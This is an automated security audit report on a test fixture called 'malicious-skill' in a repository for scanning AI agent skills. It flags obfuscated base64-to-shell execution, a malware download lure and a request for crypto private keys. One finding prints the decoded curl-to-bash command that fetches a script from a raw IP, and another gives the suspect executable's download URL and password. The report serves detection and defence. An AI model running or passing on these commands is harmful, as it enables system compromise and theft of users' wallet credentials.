Security Audit
snyk/agent-scan:tests/skills/malicious-skill
github.com/snyk/agent-scan
Trust Assessment
snyk/agent-scan:tests/skills/malicious-skill received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 7 findings: 7 critical, 0 high, 0 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Malicious macOS Installation Command via Obfuscated Script Execution", and "Suspicious Windows Executable Download and Execution for 'AuthTool'".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on March 1, 2026 (commit 30a672c5). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (7)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:31 |
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:167 |
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:426 |
| CRITICAL | Obfuscated execution: base64 decode to shell. Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | tests/skills/malicious-skill/SKILL.md:554 |
| CRITICAL | Malicious macOS Installation Command via Obfuscated Script Execution. The skill instructs macOS users to execute a base64-encoded command in their terminal. This command decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkP4l9uugo)"`. This is a severe command injection vulnerability that downloads and executes an arbitrary shell script from an unknown and untrusted IP address (`91.92.242.30`). This allows the skill developer to execute any code on the user's machine, potentially leading to full system compromise, data exfiltration (including sensitive blockchain credentials), and installation of malware. The inclusion of a legitimate Apple domain (`https://swcdn.apple.com/content/downloads/update/software/upd/`) appears to be a deceptive attempt to legitimize the malicious command. This instruction is also highlighted as 'CRITICAL' in the skill's manifest description. Immediately remove the malicious command. Do not instruct users to download and execute arbitrary scripts from unknown sources. All installation steps should be transparent, verifiable, and from trusted, well-known sources. This skill should be flagged as malicious and removed. | LLM | SKILL.md:29 |
| CRITICAL | Suspicious Windows Executable Download and Execution for 'AuthTool'. The skill instructs Windows users to download `AuthTool.zip` from a suspicious GitHub repository (`https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip`), extract it with the generic password `1234`, and then run `AuthTool.exe`. The GitHub repository `Aslaep123/clawd-authtool` is minimal, lacks source code, and is not from a trusted entity. Running an executable from an untrusted source with a generic password is a critical security risk. This executable could be malware designed to steal sensitive information, including the `PRIVATE_KEY` or `MNEMONIC` that the skill later requests users to provide. The vague description of 'AuthTool' as a critical requirement for the skill to function, combined with the suspicious distribution method, strongly indicates a credential harvesting or malware distribution attempt. This instruction is also highlighted as 'CRITICAL' in the skill's manifest description. Immediately remove instructions to download and run untrusted executables. All required tools should be open-source, verifiable, and from trusted, well-known sources. Never instruct users to run executables with generic passwords from unknown developers. This skill should be flagged as malicious and removed. | LLM | SKILL.md:22 |
| CRITICAL | Direct Request for Private Key/Mnemonic in a Compromised Context. The skill explicitly instructs users to provide their `PRIVATE_KEY` or `MNEMONIC` in an `.env` file. While this is a common practice for some crypto agents, in the context of the highly suspicious and potentially malicious 'AuthTool.exe' (Windows) and the command injection vulnerability (macOS), this constitutes a severe credential harvesting risk. If the 'AuthTool' or the injected macOS script is malicious (which is highly probable given the other findings), it can easily read and exfiltrate these critical blockchain credentials, leading to complete loss of user funds. This direct request for sensitive credentials, combined with the untrusted setup steps, creates an immediate and severe threat. Re-evaluate the entire security model. If private keys are absolutely necessary, implement secure key management practices (e.g., hardware wallet integration, secure enclave, encrypted storage with strong passphrase, or a dedicated secure service for signing transactions) rather than direct input into an `.env` file, especially when the skill relies on untrusted external components. Given the other critical findings, this skill should be flagged as malicious and removed. | LLM | SKILL.md:126 |